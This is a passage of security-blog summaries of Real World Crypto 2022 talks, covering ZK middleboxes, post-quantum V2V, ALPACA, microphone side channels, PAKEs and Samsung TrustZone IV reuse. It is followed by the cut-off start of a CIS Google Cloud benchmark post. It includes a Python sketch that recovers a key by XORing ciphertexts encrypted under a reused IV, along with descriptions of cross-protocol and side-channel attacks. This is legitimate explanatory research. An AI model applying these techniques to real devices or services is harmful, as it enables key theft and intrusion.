Of course, while side-channel leaks are an objective fact that can be measured with great precision, the choice of the “right” method to avoid them during development is a lot more subjective and developers have opinions. Having been myself a participant to that survey (as the developer of BearSSL), my own opinions put me slightly at odds with their conclusion, because I don’t use tools to tell me whether I wrote constant-time code, though it is not because I would consider that problem to be “not too hard”. It is more that I took from day 1 the extreme (extremist?) stance of always knowing how my code is translated to machine instructions, and how these get executed in the silicon. This is certainly not easy to do, and it takes time to write decent code under these conditions! But it is a necessary condition in order to achieve the size optimizations (in RAM and ROM) that BearSSL aims for, as well as ensuring correctness and decent enough performance. Constant-time behavior is a natural side-effect of developing that way. In other words, I don’t need a tool to tell me whether my code is constant-time or not, because if I cannot answer that right away then I have already failed to achieve my goals (even if the executable turns out to be, indeed, constant-time). What would be most useful to me would be a way to instruct the compiler about which data elements are secret and must not be handled in a non-constant-time way, but while some toolchains begin to include such extensions, I cannot use them without compromising portability, which is another paramount goal of BearSSL.

Notwithstanding, I support all the recommendations of the authors, in particular the following:

  • Cryptographic libraries should eliminate all timing leaks, not just those that are felt to be potentially exploitable in practice (it may be noted that “security enclaves” such as Intel’s SGX or Arm’s TrustZone are the perfect situation for a side-channel attacker, allowing exploitation of the tiniest leaks).
  • Compilers should offer ways for developers to tag secret values for which compilers should produce only constant-time code, or at least warn upon use in a non-constant-time construction. Such tagging should furthermore be standardized as much as possible, de facto if not de jure, so that portability issues don’t prevent its use.
  • Standardization bodies should mandate use of constant-time code, at least for cryptographic operations. Ideally, other standardization bodies should also require adequate support, in the programming languages, and instruction set architectures.

An unfortunate reality is that even getting the compiler to issue an instruction sequence that seems constant-time is only a part of the question. The underlying hardware will often execute operations in a way that adheres to the abstract model of the advertised architecture, but may introduce timing-based side channels; this is an increasing cause of concern, as hardware platforms become larger and more complicated, and may now themselves include arbitrary translation layers, including JIT compilers, undocumented and hidden from the application developers. In the long term, only a fully vertical approach, with guarantees at all layers from the programming language to the transistor, may provide a strong solution to timing-based side channels.

— Thomas Pornin

Zero-Knowledge Middleboxes

Paul Grubbs presented his and co-workers’ work on Zero-Knowledge Middleboxes, enabling privacy-preserving enforcement of network policies using zero-knowledge protocols. Middleboxes are systems that mediate communications between other systems, to perform a number of services, including inspection, transformation and filtering of network traffic. They are commonly found in corporate environments, universities, ISPs, etc. and in any environments that typically require enforcement of certain policies, mostly for compliance, security and performance purposes, or to share network resources amongst several devices. When middleboxes are employed for compliance and security in a given environment, their services conflict with users’ privacy (and potentially — and counter-intuitively — with the security of information exchanged between mediated systems, because of the reliance on vendors’ middleboxes and meddler-in-the-middle infrastructure’s secure implementation, for instance).

Paul Grubbs et al. propose to address this seemingly irreconcilable difference with zero-knowledge proof (ZKP) methods, so middlebox users can have both privacy and policy enforcement. They set out the following objectives for their research:

  1. Don’t weaken encryption.
  2. Network environment/Middleboxes can enforce policies as they did before.
  3. No server changes should be required.

Furthermore, circumvention should be still possible via “inner” encryption (VPN/Tor/etc.).

In a zero-knowledge proof protocol, one party, the prover, proves to another party, the verifier, that a statement is true, while preserving confidentiality of information. Zero-knowledge proofs satisfy several properties:

  • Completeness: if the statement is true and both prover and verifier follow the protocol, then the verifier is convinced of the fact provided in the statement.
  • Soundness: a malicious prover cannot convince the verifier of a false statement.
  • Zero-knowledge: a malicious verifier cannot access confidential information.

Paul described a solution architecture centered around a zero-knowledge middlebox, in which:

  • A client joins the managed network, and gets the policy that is to be enforced.
  • The client and server establish key material, and encrypt traffic as usual, e.g. using TLS 1.3.
  • The client sends the encrypted traffic along with a zero-knowledge proof that the ciphertext contains compliant traffic.
  • The managed network middlebox verifies the proof, and blocks traffic on failure, otherwise it passes the encrypted traffic to the server and back.

When the solution was first fleshed out, it was not clear to Paul and his team whether it would work at all: it relied on adapting the zero-knowledge “machinery” to complex protocols such as TLS 1.3 and its key schedule. However, they found that ZKPs applied to TLS 1.3 are close to practical, an exciting outcome of their research.

Paul then described the solution in more detail, specifically circuit models for zero-knowledge middleboxes (ZKMB). He explained that building a ZKMB amounts to constructing a circuit with a three-step pipeline:

  1. Channel opening: decrypt ciphertext, and output message.
  2. Parse + extract: find and output relevant data from message.
  3. Policy check: verify data is compliant.
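The three steps above can be sketched as ordinary functions. This is only the plain computation that a ZKMB circuit would have to encode, not a zero-knowledge proof: the toy keystream cipher, the `name=` message format and the blocklist policy are all assumptions made for illustration and are not taken from the talk.

```python
import hashlib

def keystream(key: bytes, length: int) -> bytes:
    """Toy keystream (SHA-256 in counter mode); a stand-in for a real TLS 1.3 AEAD."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def channel_open(key: bytes, ciphertext: bytes) -> bytes:
    """Step 1: decrypt the ciphertext and output the message."""
    ks = keystream(key, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, ks))

def parse_extract(message: bytes) -> str:
    """Step 2: find the policy-relevant field (a hypothetical 'name=' line)."""
    for line in message.decode().splitlines():
        if line.startswith("name="):
            return line[len("name="):]
    raise ValueError("no name field in message")

def policy_check(name: str, blocklist: set) -> bool:
    """Step 3: the data is compliant if the name is not on the blocklist."""
    return name not in blocklist

def compliant(key: bytes, ciphertext: bytes, blocklist: set) -> bool:
    """Full pipeline: channel opening, then parse + extract, then policy check."""
    return policy_check(parse_extract(channel_open(key, ciphertext)), blocklist)
```

In the real system the client would prove in zero knowledge that `compliant(...)` holds for the ciphertext the middlebox sees, without revealing the key or the plaintext. Because the toy cipher is an XOR stream, `channel_open` also serves as the encryption function when building test inputs.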

Paul described how they applied these steps to TLS 1.3, to determine if the decrypted plaintext is compliant with a given policy, and to DNS-over-HTTPS and DNS-over-TLS (respectively DoH and DoT), to filter out unauthorized encrypted DNS queries.

One of the challenges that Paul and his team had to address was how to provide a key consistency proof, because TLS record decryption is not bound to a given key. (Paul worked on similar challenges before.) At a high level, this was achieved through judicious use of the TLS 1.3 message and handshake transcript as components of the ZK proof.

The team managed to fulfill the objectives they set out at the beginning of their research:

  1. Don’t weaken encryption: use standard encryption, and the zero-knowledge property of ZKPs to conceal private information.
  2. Network environments/Middleboxes can enforce policies as they did before, using ZKPs’ soundness property. Clients cannot bypass middleboxes, and the soundness property prevents clients from lying.
  3. No server changes, facilitating easier deployment of the solution. Middleboxes don’t need to forward proofs to servers.

And (internet censorship) circumvention is still possible.

They achieved these goals with close to practical performance. For instance, in their encrypted DNS case study, they managed to generate a proof of policy compliance in 3 seconds. Further work on improving performance is already showing great promise.

This is great research work, with an obvious positive impact on privacy, and possibly an improvement to the security and reliability of access to resources gated by middleboxes, since the middleboxes no longer have to interfere with encrypted traffic through inline decryption, parsing and re-encryption.

— Gérald Doussot

Drive (Quantum) Safe! — Towards Post-Quantum Security for Vehicle-to-Vehicle Communications

Nina Bindel presented joint work with Sarah McCarthy, Hanif Rahbari, and Geoff Twardokus that outlines practical steps that can be taken to bring post-quantum (PQ) security to connected vehicle messaging. Vehicle-to-vehicle (V2V) communication encompasses applications where vehicles exchange situational awareness information in the form of Basic Safety Messages (BSMs) containing data such as location, heading, velocity, acceleration, and braking status over a wireless channel. Widespread adoption of V2V could prevent or decrease the severity of accidents, reduce congestion, and improve driving efficiency leading to less pollution. Clearly, these benefits can only be realized if V2V messages are authentic and trustworthy.

In brief:

  1. Communication is broadcast-based wireless (variant of WiFi or cellular);
  2. BSMs are broadcast at a rate of 10 per second;
  3. BSMs are authenticated using IEEE 1609.2 certificates with ECDSA signatures;
  4. Signed BSMs must be small (< 2304 bytes) and fast (~1ms generation/verification);
  5. Vehicles rotate their certificate every few minutes for privacy reasons;
  6. Certificates are only valid for 1 week, then discarded;
  7. Certificates are only included with a signed BSM every 5 messages;
  8. Vehicles currently have an average lifespan of 15+ years;
  9. ECDSA is vulnerable to quantum attacks.

In light of the above, the authors consider the challenge of providing post-quantum protection without compromising on the existing application requirements. The size constraint of 2304 bytes includes the BSM data, the signature/metadata, and the certificate/public key when necessary. Therefore, the authors conclude that a naive replacement of ECDSA with any existing PQ scheme is simply not possible.

As a first step, a hybrid approach is proposed. Each classical ECDSA-based certificate is paired with a PQ certificate using Falcon. When a BSM transmission includes a certificate, both the ECDSA and Falcon certificates are included, along with only an ECDSA signature. This allows both certificates to be communicated without violating the size constraints, but does not provide PQ security for that particular message. All other messages carry a hybrid signature, which remains secure as long as at least one of the classical or PQ signatures is secure. Therefore, once certificates are communicated, the remaining messages achieve PQ security. This comes at the cost of increasing the resulting message size by a factor of 5-6, with signed BSMs increasing from ~144 bytes to ~834 bytes.
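The size budget behind this design can be checked with some rough arithmetic. The sketch below uses the published public key and signature sizes of the schemes, but the 80-byte payload (the ~144-byte signed BSM minus a 64-byte ECDSA signature) and the simplified certificate model (subject public key plus issuer signature) are assumptions for illustration; real IEEE 1609.2 certificates carry additional fields.

```python
MAX_BSM_BYTES = 2304  # size limit quoted in the text

# Sizes in bytes: (public key, signature).
SIZES = {
    "ecdsa-p256": (33, 64),      # compressed point, raw (r, s) pair
    "falcon-512": (897, 666),
    "dilithium2": (1312, 2420),
}

# ASSUMPTION: BSM data plus metadata, i.e. ~144 bytes minus a 64-byte signature.
PAYLOAD = 80

def cert_size(scheme: str) -> int:
    """Simplified certificate: a public key plus an issuer signature of the same scheme."""
    public_key, signature = SIZES[scheme]
    return public_key + signature

def message_size(sig_schemes, cert_schemes=()) -> int:
    """Payload plus every attached signature and every attached certificate."""
    return (PAYLOAD
            + sum(SIZES[s][1] for s in sig_schemes)
            + sum(cert_size(c) for c in cert_schemes))

def fits(size: int) -> bool:
    """True if a message of this size respects the BSM size limit."""
    return size <= MAX_BSM_BYTES
```

Under these assumptions, a hybrid-signed message without certificates comes to 810 bytes, roughly in line with the ~834 bytes quoted above, and a certificate-bearing message with both certificates and only an ECDSA signature comes to 1804 bytes, which fits. A message signed with Dilithium2 alone would already be 2500 bytes, over the limit before any certificate is attached.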

To improve on the hybrid proposal, the authors propose a partially-PQ hybrid. Observing that CA keys are somewhat long-lived, whereas the keys used to sign BSMs are only used for short durations during a 1-week period, the authors propose continuing to sign BSMs with a classical ECDSA key, but certifying these ECDSA keys using a PQ scheme. In order to launch a successful attack, a quantum adversary would need to compromise the ECDSA private key during this short usage window, and would not gain the ability to certify adversarially-controlled keys. To maintain flexibility and the ability to use a PQ algorithm where the PQ certificate size may exceed the maximum BSM size, the PQ certificate may be fragmented and sent in pieces alongside consecutive BSMs. Under this approach, all BSMs are signed with the ECDSA key to provide classical security, and after sufficiently many BSMs are received, a PQ signature certifying the ECDSA key is established.
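The fragmentation idea can be illustrated with a small sketch. The fragment format `(index, total, piece)` and the `Reassembler` class are hypothetical and are not taken from the paper; they only show how a receiver could collect pieces across consecutive BSMs and obtain the PQ certificate once the last one arrives.

```python
def fragment(cert: bytes, chunk: int):
    """Split a certificate into (index, total, piece) fragments of at most `chunk` bytes."""
    pieces = [cert[i:i + chunk] for i in range(0, len(cert), chunk)]
    return [(i, len(pieces), piece) for i, piece in enumerate(pieces)]

class Reassembler:
    """Collects fragments, in any order, until the certificate is complete."""

    def __init__(self):
        self.pieces = {}
        self.total = None

    def add(self, index: int, total: int, piece: bytes):
        """Record one fragment; return the full certificate once all have arrived, else None."""
        self.total = total
        self.pieces[index] = piece
        if len(self.pieces) == self.total:
            return b"".join(self.pieces[i] for i in range(self.total))
        return None
```

Until `add` returns the complete certificate, the receiver in this sketch can rely only on the classical ECDSA signature on each BSM, which matches the behaviour described above.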

The proposed solutions are interesting because they remain within the constraints established by existing standards. The overhead required to accommodate the partially-PQ approach does substantially impact the theoretical performance of V2V messaging, but an optimized partially-PQ approach can still achieve ~60% of the throughput of the classical system, despite the much greater key sizes required by PQ approaches. While there may be several more challenges in bringing PQ security to connected vehicle communications, this presentation provides solid first steps in realizing this outcome.

— Kevin Henry

ALPACA: Application Layer Protocol Confusion – Analyzing and Mitigating Cracks in TLS Authentication

In this talk, Marcus Brinkmann presented the ALPACA attack, which exploits misconfigurations of TLS servers to negate web security by redirecting TLS requests to servers running non-intended applications. For example, they show that in some realistic scenarios, such as when a wildcard certificate is used by both an HTTP and an FTP server for TLS server authentication, an attacker can redirect an HTTP request to an FTP server instead and use this to steal cookies or to allow the execution of arbitrary code on the client device (which believes the response came from the HTTP server). Their team focused on the case of redirecting HTTP requests to SMTP, IMAP, POP3, or FTP servers, but note that redirection attacks are possible between other pairs of applications as well.

The idea behind the ALPACA attack is not new: according to their website, this attack vector has been known since 2001 and was exploited in an attack against a specific implementation in 2015. However, this talk generalized the idea by formalizing it as a class of cross-protocol attacks, and presented an internet-wide scan of servers running these TLS applications, which showed that there is still a large number (>100,000) of vulnerable servers.

As mitigations, the authors suggest cryptographic measures rather than addressing this attack at the application layer: they show that strict enforcement of the Application Layer Protocol Negotiation (ALPN) and Server Name Indication (SNI) extensions in TLS can prevent this attack, despite the fact that neither of these extensions was originally intended as a security measure for TLS.
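To make the ALPN part concrete, here is a minimal client-side sketch using Python's standard `ssl` module. It covers only the client half of the mitigation, and the helper names `make_client_context` and `require_alpn` are hypothetical; servers also need to reject connections whose ALPN or SNI values do not match the service they offer.

```python
import ssl

def make_client_context(protocols):
    """Client context that verifies the certificate and hostname and offers ALPN protocols."""
    ctx = ssl.create_default_context()
    ctx.set_alpn_protocols(protocols)
    return ctx

def require_alpn(selected, offered):
    """Abort unless the server explicitly selected one of the offered protocols."""
    if selected is None or selected not in offered:
        raise ssl.SSLError("server did not confirm an offered ALPN protocol")
    return selected
```

After wrapping a connected socket with `ctx.wrap_socket(sock, server_hostname=host)`, which also sends the SNI value, the client would call `require_alpn(tls_sock.selected_alpn_protocol(), ["http/1.1"])` and drop the connection if it raises. A server that speaks a different protocol, such as FTP, has no reason to select `http/1.1`, so a redirected connection fails before any application data is exchanged.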

This talk demonstrates how protocols that have been proven secure can still be targeted by attacks, by considering scenarios outside of the scope of the proof. Additionally, it highlights how difficult it is to mitigate attacks on the internet at large, even if they’ve been known for a long time. On the flip side, it also provides a silver lining — by showing how our existing tools sometimes already do (or can easily be modified to do) more than we originally designed them for.

— Elena Bakos Lang

Lend Me Your Ear: Passive Remote Physical Side Channels on PCs

In the last, and arguably most glamorous, talk of the conference’s first session, Daniel Genkin and Roei Schuster presented a very real-world demonstration of a physical side-channel attack. Their talk was based on research to be presented at the upcoming Usenix Security ’22 conference, and showed how built-in microphones in commodity PCs capture electromagnetic leakage that can be used to perform impressive side-channel attacks.

Side-channel attacks can broadly be placed in two categories: attacks exploiting software-based side-channels (such as microarchitectural attacks, including Spectre and Meltdown, or timing attacks exploiting timing differences in the processing of sensitive data), and physical side-channel attacks where the leakage emitted by a processing component can be used to extract sensitive information (examples of leakages include the power consumption of a device, or electromagnetic emanations).

While physical side-channel attacks can be extremely powerful — they are essentially passive attacks that require only measuring the target’s emissions — they are sometimes swept under the rug since they require physical proximity to the victim’s computer. In this talk, the speakers presented a remote physical side-channel attack which can be carried out without running any code on the victim’s machine.

This research sprouted from an interesting observation: modern-day laptops have an internal microphone which is physically wired to the motherboard of the computer. That motherboard also hosts the processor, which emits electromagnetic radiation. The wiring of that microphone essentially acts as an electromagnetic probe, which then picks up small emanations produced by the processor. Since microphone input is nowadays frequently transmitted over the internet (think, for example, audio being transmitted by VoIP or conferencing software), that side-channel leakage may be observed remotely.

As a demonstration, Daniel proceeded to display the spectrogram (i.e. the graph of frequencies over time) of the signal captured in real-time by a laptop’s microphone. In addition to picking up the voice of the speaker on the lower end of the frequency spectrum, some patterns in the high-frequency spectrum could be observed, stemming from the electromagnetic emissions of the processor. By running a demo program performing some heavy processor operations, the speaker highlighted how the shape of these high-frequency patterns changed, clearly indicating that the processor’s emissions were dependent on the computation being performed. The second speaker, Roei, then proceeded to showcase three remote attacks leveraging this novel side-channel leakage.

In a first example, Roei demonstrated an attack in which an adversary could remotely identify the website that a victim visited. To do so, a neural network was trained to classify the leakage patterns produced when the victim’s device accesses different websites, based only on the processor’s electromagnetic emissions as captured remotely.

In a second example, the speaker presented a cryptographic key extraction attack on ECDSA. This scenario was a little more complex in that it leveraged an implementation with a known timing side-channel leakage in the ECDSA nonce scalar multiplication operation, and also required the usage of deterministic ECDSA RFC 6979 in order to obtain enough information to correctly implement the attack. However, the researchers were able to successfully mount an attack extracting the secret key from leakage traces of around 20k signed messages.

The third example showcased how this side-channel leakage could also be used to gain a competitive advantage when playing video games. In a recorded demonstration, the speaker showed an instance of the video game Counter-Strike, where an attacker and a victim were competing against each other while also being connected via VoIP (a seemingly likely scenario in the competitive video game community). The attack essentially exploits the fact that a player’s machine renders the opponent’s avatar even if that opponent is not in the visual field of that player. Since rendering is a processor-heavy operation, the attacker is able to gain an advantage in the game by determining the player’s proximity only by observing the electromagnetic emissions from the victim’s processor!

This talk presented some impressive new results on remote side-channel leakage and demonstrated three real-world attacks that are worth watching, paving the way for exciting future work.

— Paul Bottinelli

CHIP and CRISP — Password-based Key Exchange: Storage Hardening Beyond the Client-Server Setting

Eyal Ronen spoke about his work (with Cas Cremers, Moni Naor, and Shahar Paz) on password-authenticated key exchange (PAKE) protocols in the symmetric setting. We’ve been told many times over the years that passwords are “dead” — and yet, as Eyal pointed out, they are still the most ubiquitous form of authentication.

CHIP and CRISP are protocols that allow two parties to use a (possibly low-entropy) password to derive a shared secret key without needing to re-enter the plaintext password as input every time. They are designed for a symmetric, many-to-many setting: each entity (device) knows the password, and any device can initiate the protocol with any other device. (Compare this with the asymmetric, client-server setting where only the client knows the password.)

CHIP (Compromise Hindering Identity-based PAKE) and CRISP (Compromise Resilient Identity-based Symmetric PAKE) are “identity-based” PAKEs designed to be resistant to key compromise impersonation attacks: compromising one device does not allow impersonating other parties to that device.

CRISP, which the rest of this section will focus on, is a strong PAKE: whatever derivative of the password is stored on the devices resists pre-computation attacks. Resistance to such attacks is particularly important when passwords are involved, since password distributions mean these attacks would scale well.

Each device generates a password file in a one-time process after which the password can be deleted (and does not need to be re-input). This process uses a device’s identity, which is a (not necessarily unique) tag. Specifically, in CRISP, the device with identity id and password pwd stores {g_2}^{x} (a salt), H_1(\texttt{pwd})^{x} (a salted password hash), and H_2(\texttt{id})^{x} (a salted identity hash).

When two devices want to establish an authenticated channel, they first perform a kind of identity-based key agreement using the salted values in their password file blinded by a session-specific random value. This is a Diffie-Hellman style exchange, plus some pairings, to establish a shared secret and verify each other’s identity. The shared secret is then fed into any symmetric PAKE protocol (such as CPace) to get the final shared key.
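The reason pairings fit naturally with such salted values follows from bilinearity. As a generic illustration (not a step quoted from the paper), assume a bilinear pairing e from G_1 × G_2 to G_T, with H_1 hashing into G_1 and g_2 generating G_2; this group assignment is an assumption, since the summary above does not spell it out. Then the salt x can be moved between the two arguments:

```latex
e\big(H_1(\texttt{pwd})^{x},\, g_2\big)
  \;=\; e\big(H_1(\texttt{pwd}),\, g_2\big)^{x}
  \;=\; e\big(H_1(\texttt{pwd}),\, {g_2}^{x}\big)
```

A relation of this kind lets two values salted with the same x be related to each other without the exponent x ever being revealed.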

This structure makes it clear why CRISP is called a compiler that transforms a symmetric PAKE into one that’s identity-based and resilient to compromise. But why is the PAKE necessary to obtain the shared key when the step before allows the two parties to compute a shared secret? The paper describes (in section 6.3) how replacing the PAKE with a KDF would not be secure, as it would allow an adversary to make multiple offline password guesses based on just one key agreement step with another party. Whether the full strength of a symmetric PAKE is needed is unclear (and possibly future work!).

Perhaps one of the trickiest practical aspects of identity-based PAKEs is handling identities: since there is no (central) key distribution center, any party that knows the password can claim to have any identity. This would make it difficult to provide effective revocation.

For the details of CHIP and CRISP, see the paper on eprint. You can also check out the authors’ implementations of CHIP and CRISP on GitHub.

— Marie-Sarah Lacharité

Trust Dies in Darkness: Shedding Light on Samsung’s TrustZone Cryptographic Design

Alon Shakevsky demonstrated ways in which a closed-source TrustZone that is deployed at Android’s massive scale (approximately 100 million Samsung devices) can have well-known vulnerabilities that go unnoticed for many years. This talk presented the research that Alon published along with Eyal Ronen and Avishai Wool. To carry out this research, they first reverse-engineered Android’s hardware-backed keystore and demonstrated that an IV reuse attack was possible, then they examined the impact of this finding in higher level protocols. They also demonstrated that the version that used proper randomness was still susceptible to a downgrade attack that made it just as vulnerable.

As is common with Trusted Execution Environment (TEE) designs, all cryptographic key materials (mostly used for signing or encryption) must reside inside the TrustZone. However, according to this research, in some Samsung Galaxy devices, there was support for exporting the encrypted key blobs. The question now became, how’s this key encryption key (referred to as a Hardware Derived Key or HDK in the slides) generated? It turns out that a permanent device-unique 256-bit AES key called the Root Encryption Key (REK) along with a salt and IV were used to derive this key: encrypted_blob = AES-GCM(HDK = KDF(REK, salt), IV, key_material). As Alon pointed out, this is a fragile construction since if the HDK is static in an application, then it becomes highly vulnerable to an IV reuse attack. Then the next question is, how are the salt and IV chosen? In 2 out of 3 versions that were examined, the salt was derived from application-provided ID and data, and the IV was also provided by the application. Given this construction, a privileged attacker who observes the encrypted_blob for key A can extract its IV and salt and use them to fabricate the encrypted_blob for a known key B. The final step is to XOR the two encrypted_blobs (i.e. the ciphertexts of keys A and B) with key B (in plaintext) to recover key A.
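The final XOR step can be demonstrated with a short sketch. Since Python's standard library has no AES, the keystream below is a SHAKE-256 stand-in for the AES-GCM counter-mode keystream, and the GCM authentication tag is omitted; the function names and the stand-in KDF are assumptions for illustration. The property that matters is the same: the keystream is fixed by the (HDK, IV) pair alone.

```python
import hashlib

def keystream(hdk: bytes, iv: bytes, length: int) -> bytes:
    """Stand-in for the AES-GCM keystream: fully determined by the key and the IV."""
    return hashlib.shake_256(hdk + iv).digest(length)

def encrypt_blob(hdk: bytes, iv: bytes, key_material: bytes) -> bytes:
    """Encrypt key material by XORing it with the keystream (no auth tag in this sketch)."""
    ks = keystream(hdk, iv, len(key_material))
    return bytes(m ^ k for m, k in zip(key_material, ks))

def recover_key_a(blob_a: bytes, blob_b: bytes, key_b: bytes) -> bytes:
    """XOR both blobs with the known key B; the shared keystream cancels, leaving key A."""
    return bytes(a ^ b ^ k for a, b, k in zip(blob_a, blob_b, key_b))

# Demo: the same salt and IV give the same HDK and the same keystream for both blobs.
hdk = hashlib.sha256(b"REK" + b"salt").digest()  # stand-in for KDF(REK, salt)
iv = b"\x00" * 12
key_a = hashlib.sha256(b"victim key").digest()   # unknown to the attacker
key_b = b"B" * 32                                # chosen by the attacker
blob_a = encrypt_blob(hdk, iv, key_a)
blob_b = encrypt_blob(hdk, iv, key_b)
assert recover_key_a(blob_a, blob_b, key_b) == key_a
```

The attacker never learns the HDK or the REK. Being able to make the keystore encrypt a known key under the same salt and IV is enough to recover key A.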

Once details of the IV reuse attack were worked out, Alon proceeded to describe the extent of the exploits that are possible without a user’s involvement. The story gets more painful when you learn that, in an attempt to provide backwards compatibility, the version that used randomized salts (V20-s10) was in fact susceptible to a downgrade attack.

The key takeaway messages are:

  1. If AES in GCM mode must be used in an application, use a nonce misuse resistant variant such as AES-GCM-SIV to prevent IV reuse. Or, always generate a random IV without exposing it in the API.
  2. Never allow clients to choose the encryption version and downgrade to a latent code path. This is especially important if backwards compatibility is a requirement.

As Alon pointed out towards the end of his talk, this research demonstrated the downside of composable protocols, such as WebAuthn, which allow key attestation via a hardware keystore that could be compromised: once the vulnerability is disclosed, servers have no way of verifying whether a given certificate was generated on a vulnerable device or not. In addition, closed-source and vendor-specific TEE implementations enable these types of issues to go unnoticed for an extended time period. Alon indicated that he advocates for a uniform open standard by Google for the Keymaster Hardware Abstraction Layer and Trusted Applications to close this gap.

Finally, their paper “Trust Dies in Darkness: Shedding Light on Samsung’s TrustZone Keymaster Design” on eprint demonstrates a working FIDO2 WebAuthn login bypass and a compromise of Google’s Secure Key Import. The appendix section provides some insights and code snippets that could be helpful for future research in this area. It is worth mentioning that Samsung has already patched their devices and issued 2 CVEs that are relevant to this work: CVE-2021-25444 for the IV reuse vulnerability and CVE-2021-25490 for the downgrade attack.

— Parnian Alimi

Mitigating the top 10 security threats to GCP using the CIS Google Cloud Platform Foundation Benchmark

20 April 2022 at 16:47

As one of the proud contributors to the newest version of the CIS Google Cloud Platform Foundation Benchmark, I wanted to raise awareness about the new version release of this benchmark [1] by the Center for Internet Security (CIS) and how it can help a company to set a strong security baseline or foundation for their Google Cloud environment. As we have seen previously in our Shaking The Foundation of An Online Collaboration Tool blog post [3], the CIS Microsoft 365 Security Foundation Benchmark (to which we also contributed) was very helpful in setting the baseline security that organizations should aim to have for Microsoft 365 deployments.

This time we will take a closer look at what the CIS Google Cloud Platform Foundation Benchmark offers against 10 of the most common GCP misconfigurations that NCC Group comes across during client assessments. These were previously discussed in our blog post called Securing Google Cloud Platform – Ten best practices [2]. In addition, at the end of the post we will see whether the CIS Benchmark is indeed in line with the recommendations arising from real-life engagements. Where possible, the top 10 best practices will be extended with the benchmark recommendations, and anything missing will be called out. The best practices are often related to misconfigurations in a service, so the post will group them together around the related service if possible.

NCC Top 10 best practices vs CIS Google Cloud Platform Foundation Benchmark

Resource Segregation

The first recommendation was to segregate resources by projects to create isolation boundaries and ensure that projects contain the resources that are related to the project.

The benchmark implicitly assumes resource segregation, as stated in the Overview section: “Most of the recommendations provided with this release of the benchmark cover security considerations only at the individual project level and not at the organization level.” [1] Even though there is no dedicated recommendation for it in the categories, there are some for separation of duties.

The CIS Benchmark has the following recommendations related to separation, segmentation and segregation:

  • Ensure That Separation of Duties Is Enforced While Assigning Service Account Related Roles to Users
  • Ensure That Separation of Duties Is Enforced While Assigning KMS Related Roles to Users

Although the benchmark already assumes project level segregation, it adds some more recommendations for IAM separation which is also related to the next main area.

IAM

Next in the list were two IAM security related best practices: limit the use of cloud IAM primitive roles and rotate cloud IAM service account access keys periodically. The primitive roles do not follow the principle of least privilege and should be avoided. Instead, assigning the roles predefined by GCP to groups or users is the recommended approach. Service account access keys are highly sensitive, because they could belong to an application or an instance and in case of compromise, an attacker would be able to access and interact with those resources accessible by the service account in the GCP environment.
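As an illustration of how the primitive-role check could be automated, the sketch below scans an IAM policy in the JSON shape returned by `gcloud projects get-iam-policy PROJECT_ID --format=json`. The helper name `primitive_role_bindings` is hypothetical, and the sample data is made up.

```python
# The three primitive (basic) roles that the best practice advises against.
PRIMITIVE_ROLES = {"roles/owner", "roles/editor", "roles/viewer"}

def primitive_role_bindings(policy: dict):
    """Return (role, member) pairs where a primitive role is granted."""
    return [(binding["role"], member)
            for binding in policy.get("bindings", [])
            if binding.get("role") in PRIMITIVE_ROLES
            for member in binding.get("members", [])]

# Made-up sample policy for illustration.
sample_policy = {
    "bindings": [
        {"role": "roles/editor", "members": ["user:alice@example.com"]},
        {"role": "roles/storage.objectViewer", "members": ["group:ops@example.com"]},
    ]
}
findings = primitive_role_bindings(sample_policy)
```

Each finding is a candidate for replacement with a narrower predefined role. The sketch only inspects project-level bindings and does not cover roles inherited from folders or the organization.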

The CIS Benchmark has the following recommendations for IAM:

  • Ensure that Corporate Login Credentials are Used
  • Ensure that Multi-Factor Authentication is ‘Enabled’ for All Non-Service Accounts
  • Ensure that Security Key Enforcement is Enabled for All Admin Accounts
  • Ensure That There Are Only GCP-Managed Service Account Keys for Each Service Account
  • Ensure That Service Account Has No Admin Privileges
  • Ensure That IAM Users Are Not Assigned the Service Account User or Service Account Token Creator Roles at Project Level
  • Ensure User-Managed/External Keys for Service Accounts Are Rotated Every 90 Days or Fewer
  • Ensure API Keys Are Rotated Every 90 Days

We can see that the benchmark includes the same recommendations, with more controls around authentication and authorization to reduce the risk of an attacker elevating privileges or performing successful password attacks, and to limit the blast radius of a compromised account.

Network Security

Another important category was network security, where NCC Group often finds overly permissive firewall rules and disabled VPC flow logs in client environments. It is important to lock down the network and allow network communications only between hosts that are required to communicate, so that attack vectors are minimized and lateral movement across virtual machines and networks can be prevented.
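A check for overly permissive rules could look like the following sketch, which inspects firewall rules in the JSON shape returned by `gcloud compute firewall-rules list --format=json`. The helper names are hypothetical, and only IPv4 exposure to `0.0.0.0/0` over TCP is considered; IPv6 ranges, source tags and rule priorities are ignored for brevity.

```python
def port_in_spec(port: int, spec: str) -> bool:
    """Match a port against a single entry such as "22" or a range such as "20-25"."""
    if "-" in spec:
        low, high = spec.split("-", 1)
        return int(low) <= port <= int(high)
    return int(spec) == port

def exposes_port(rule: dict, port: int) -> bool:
    """True if an enabled ingress allow rule opens `port` (TCP) to 0.0.0.0/0."""
    if rule.get("direction", "INGRESS") != "INGRESS" or rule.get("disabled", False):
        return False
    if "0.0.0.0/0" not in rule.get("sourceRanges", []):
        return False
    for allowed in rule.get("allowed", []):
        if allowed.get("IPProtocol") not in ("tcp", "all"):
            continue
        ports = allowed.get("ports")
        # An allow entry without a ports list applies to every port.
        if not ports or any(port_in_spec(port, spec) for spec in ports):
            return True
    return False
```

Calling `exposes_port(rule, 22)` and `exposes_port(rule, 3389)` for each rule flags SSH and RDP exposed to the internet.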

The CIS Benchmark has the following recommendations for Networks:

  • Ensure That DNSSEC Is Enabled for Cloud DNS
  • Ensure That RSASHA1 Is Not Used for the Key-Signing Key in Cloud DNS DNSSEC
  • Ensure That RSASHA1 Is Not Used for the Zone-Signing Key in Cloud DNS DNSSEC
  • Ensure That SSH Access Is Restricted From the Internet
  • Ensure That RDP Access Is Restricted From the Internet
  • Ensure that VPC Flow Logs is Enabled for Every Subnet in a VPC Network
  • Ensure No HTTPS or SSL Proxy Load Balancers Permit SSL Policies With Weak Cipher Suites
  • Use Identity Aware Proxy (IAP) to Ensure Only Traffic From Google IP Addresses are ‘Allowed’

We can see that the benchmark breaks security controls into smaller, more specific recommendations for securing networks and extends its scope to DNS, SSL and IAP. It is worth noting that some of the network security settings are also discussed or mentioned in other sections where the actual service recommendations are defined, for example Cloud SQL and the corresponding firewall rules.

Cloud Storage

